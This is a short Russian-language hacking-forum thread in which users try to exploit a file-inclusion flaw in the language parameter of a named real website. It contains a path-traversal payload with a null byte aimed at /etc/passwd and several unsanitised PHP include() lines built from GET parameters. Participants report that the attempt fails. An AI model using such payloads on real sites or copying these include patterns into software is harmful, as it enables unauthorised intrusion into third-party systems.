Форум АНТИЧАТ - Не совсем понятный инклюдинг

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Не совсем понятный инклюдинг (https://forum.antichat.xyz/showthread.php?t=44817)

Не совсем понятный инклюдинг

вот в чем проблема url
/index.php?dir=home/investors&new_language=ru
инклюдит
languages/lang.ru.php
а например
/index.php?dir=home/investors&new_language=fack
выводит
languages/lang.fack.php
есть ли вожможность затереть land ?
если интересно сайт
nadex.by

скорее всего там функция вида:

PHP код:


		
			
include("languages/lang.".$_GET['new_language'].".php");

если не фильтруются "." и ".." можно попробовать
/index.php?dir=home/investors&new_language=./../../../../../../etc/passwd%00
хз прокатит или нет

Не катит :((
Хотя %00 при хтмл кодировке не фильтруеца

Как таковых там 5 инклудов звисящих от параметра new_language:
первый это который описал ENFIX, второй это

PHP код:


		
			
 include("html/left.".$_GET['new_language']);

третий

PHP код:


		
			
 include("html/left.2.".$_GET['new_language']);

четвертый

PHP код:


		
			
 include("html/".$_GET['dir']."/index.".$_GET['new_language']);

и пятый

PHP код:


		
			
 include("html/".$_GET['dir']."/index.2.".$_GET['new_language']);

Инклуд провести не получится ибо папок index.2., index., left.2. и left. не существует и при данной конфигурации сервера низя проинклудить файлы, путь к которым идёт через несуществующую диру=\